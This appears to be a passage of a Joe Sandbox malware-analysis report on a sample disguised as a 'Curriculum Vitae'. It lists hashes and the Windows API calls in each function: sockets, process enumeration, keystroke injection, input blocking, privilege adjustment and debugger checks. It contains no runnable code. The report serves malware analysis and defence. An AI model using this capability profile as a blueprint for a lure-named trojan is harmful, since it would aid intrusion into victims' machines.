                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$LongProcWindow
                      • String ID:
                      • API String ID: 3131106179-0
                      • Opcode ID: de4df8461da69468eef54eaa73706807ba7e37fe3d2836e9546f86aba0387a4e
                      • Instruction ID: 987fbc810d7e0ff0014906c2d1aa780e647a35e9455c130272328355489dd0e8
                      • Opcode Fuzzy Hash: de4df8461da69468eef54eaa73706807ba7e37fe3d2836e9546f86aba0387a4e
                      • Instruction Fuzzy Hash: 3EA13B70208544BFE728BA3E8CBAE7BB69DDB82350F284209F142DA695CA25DD41D375
                      APIs
                        • Part of subcall function 00DB304E: inet_addr.WSOCK32(?), ref: 00DB307A
                        • Part of subcall function 00DB304E: _wcslen.LIBCMT ref: 00DB309B
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB185D
                      • WSAGetLastError.WSOCK32 ref: 00DB1884
                      • bind.WSOCK32(00000000,?,00000010), ref: 00DB18DB
                      • WSAGetLastError.WSOCK32 ref: 00DB18E6
                      • closesocket.WSOCK32(00000000), ref: 00DB1915
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 1601658205-0
                      • Opcode ID: eca11a0553a178250684471bfb63105394121ddf17a09609c267b84c1fd13b6b
                      • Instruction ID: 924a9c5410cd2317ccc7f2e2a2d0ca804ae0caa462b5312a4a559e1fb6b1d67c
                      • Opcode Fuzzy Hash: eca11a0553a178250684471bfb63105394121ddf17a09609c267b84c1fd13b6b
                      • Instruction Fuzzy Hash: 31519475A00210AFDB10AF24C896F6A77A5EF48718F488458FA5A9F393C671ED418BB1
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: fa78123347a956d62da1218aff219867bb442121f9cd6590c29fe5348c468db5
                      • Instruction ID: a3e54d6d4787ad57836aa00586e97d74351dd872cc4039fbb6da8e455d04c084
                      • Opcode Fuzzy Hash: fa78123347a956d62da1218aff219867bb442121f9cd6590c29fe5348c468db5
                      • Instruction Fuzzy Hash: 1F217E357402225FD7208F1AC984F6ABBA5EF96315F19905CE84ACB352C771E842CBB0
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00DBA6AC
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00DBA6BA
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • Process32NextW.KERNEL32(00000000,?), ref: 00DBA79C
                      • CloseHandle.KERNEL32(00000000), ref: 00DBA7AB
                        • Part of subcall function 00D4CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D73303,?), ref: 00D4CE8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                      • String ID:
                      • API String ID: 1991900642-0
                      • Opcode ID: e5a251d9d2a595096f0a7fc40e129bac0105504c668293f83acf227a0b13ec29
                      • Instruction ID: 60378e1c6806c5efe71603a3101acaa1cf9fd609829abe81f200190e60181c00
                      • Opcode Fuzzy Hash: e5a251d9d2a595096f0a7fc40e129bac0105504c668293f83acf227a0b13ec29
                      • Instruction Fuzzy Hash: 87514C71508301AFD710EF25C886A6BBBE8FF89754F44891DF58A97251EB70D904CBB2
                      APIs
                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D9AAAC
                      • SetKeyboardState.USER32(00000080), ref: 00D9AAC8
                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D9AB36
                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D9AB88
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 221ade03fe557fb7b961886baaa3b0291afeff9cc65fbf0bfe4390e42e0eb23a
                      • Instruction ID: c7b6e56aeb09b55dc26ef015d44dd18ddc52d6e313622a9a20bf69587df069ce
                      • Opcode Fuzzy Hash: 221ade03fe557fb7b961886baaa3b0291afeff9cc65fbf0bfe4390e42e0eb23a
                      • Instruction Fuzzy Hash: E4312832A40218AFFF348B6C8C05BFA7BA6AB45318F08421AF1C5961D0D7748981C7F2
                      APIs
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00DACE89
                      • GetLastError.KERNEL32(?,00000000), ref: 00DACEEA
                      • SetEvent.KERNEL32(?,?,00000000), ref: 00DACEFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorEventFileInternetLastRead
                      • String ID:
                      • API String ID: 234945975-0
                      • Opcode ID: 7ce3a8538058acb933aa3b2f57df62d34ece50420a1c5457ef59b68c9bd18710
                      • Instruction ID: 7976f0c6fbfe2fb83b72d049b4c375c413f3079c4a002915198fdab59b1b9767
                      • Opcode Fuzzy Hash: 7ce3a8538058acb933aa3b2f57df62d34ece50420a1c5457ef59b68c9bd18710
                      • Instruction Fuzzy Hash: 51218C71510306AFEB20DF65C948BA6B7F8EF51364F14542AEA46D2151EB70EE08CBB4
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D982AA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: f21acdded3a5c436021c22089ac4352bf437ea8f651097bf0b556956aa697269
                      • Instruction ID: ca9679e03419b9e76af35ef84a34b7f4f4f17e3152b7f1de9b30a1d2623ae797
                      • Opcode Fuzzy Hash: f21acdded3a5c436021c22089ac4352bf437ea8f651097bf0b556956aa697269
                      • Instruction Fuzzy Hash: FF323475A007059FCB28CF59C481A6AB7F0FF48B10B15C56EE49ADB3A1EB70E941CB64
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA5CC1
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA5D17
                      • FindClose.KERNEL32(?), ref: 00DA5D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: eafac9b4e264f8b795ce26e3b2b269c054fc234f69a0e839fe6a751721d0e22c
                      • Instruction ID: 2dceed95da14009436b15cf1d5af249c5e1d823792508add32f8faf18cf70340
                      • Opcode Fuzzy Hash: eafac9b4e264f8b795ce26e3b2b269c054fc234f69a0e839fe6a751721d0e22c
                      • Instruction Fuzzy Hash: 92518A75604A029FCB14CF28D494E96B7E4FF4A324F14855DE99A8B3A1CB30ED45CFA1
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00D6271A
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D62724
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00D62731
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: cdf75f9771d09c484db87d1a6bf48dbb0c113768406a222dcf978891af901214
                      • Instruction ID: 9c24daa3bc80032c06a30c2651d4a03a21af93f54993cf99f0909a5bf7b01d84
                      • Opcode Fuzzy Hash: cdf75f9771d09c484db87d1a6bf48dbb0c113768406a222dcf978891af901214
                      • Instruction Fuzzy Hash: CD31C47491131DABCB21DF64DC88B98BBB8EF08310F5041EAE80CA6260E7309F858F64
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA51DA
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DA5238
                      • SetErrorMode.KERNEL32(00000000), ref: 00DA52A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: fc8415c66d5b03ed5ff3763e7227a8191df09a2f078fe831b99404a08fd55913
                      • Instruction ID: 398286499e001d3ca4399991279f4def0ceb3241ece86db662479908d290308f
                      • Opcode Fuzzy Hash: fc8415c66d5b03ed5ff3763e7227a8191df09a2f078fe831b99404a08fd55913
                      • Instruction Fuzzy Hash: 1E318E75A10609DFDB00DF54D884FADBBB4FF49314F088099E809AB366CB31E845CBA0
                      APIs
                        • Part of subcall function 00D4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D50668
                        • Part of subcall function 00D4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D50685
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                      • GetLastError.KERNEL32 ref: 00D9174A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                      • String ID:
                      • API String ID: 577356006-0
                      APIs
                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D9D608
                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00D9D645
                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D9D650
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle
                      • String ID:
                      • API String ID: 33631002-0
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00D9168C
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D916A1
                      • FreeSid.ADVAPI32(?), ref: 00D916B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      APIs
                      • GetCurrentProcess.KERNEL32(00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000,?,00D628E9), ref: 00D54D09
                      • TerminateProcess.KERNEL32(00000000,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000,?,00D628E9), ref: 00D54D10
                      • ExitProcess.KERNEL32 ref: 00D54D22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: /
                      • API String ID: 0-2043925204
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 00D8D28C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID: X64
                      • API String ID: 2645101109-893830106
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA6918
                      • FindClose.KERNEL32(00000000), ref: 00DA6961
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DB4891,?,?,00000035,?), ref: 00DA37E4
                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DB4891,?,?,00000035,?), ref: 00DA37F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      APIs
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D9B25D
                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00D9B270
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InputSendkeybd_event
                      • String ID:
                      • API String ID: 3536248340-0
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D911FC), ref: 00D910D4
                      • CloseHandle.KERNEL32(?,?,00D911FC), ref: 00D910E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D66766,?,?,00000008,?,?,00D6FEFE,00000000), ref: 00D66998
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      APIs
                      • BlockInput.USER32(00000001), ref: 00DAEABD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
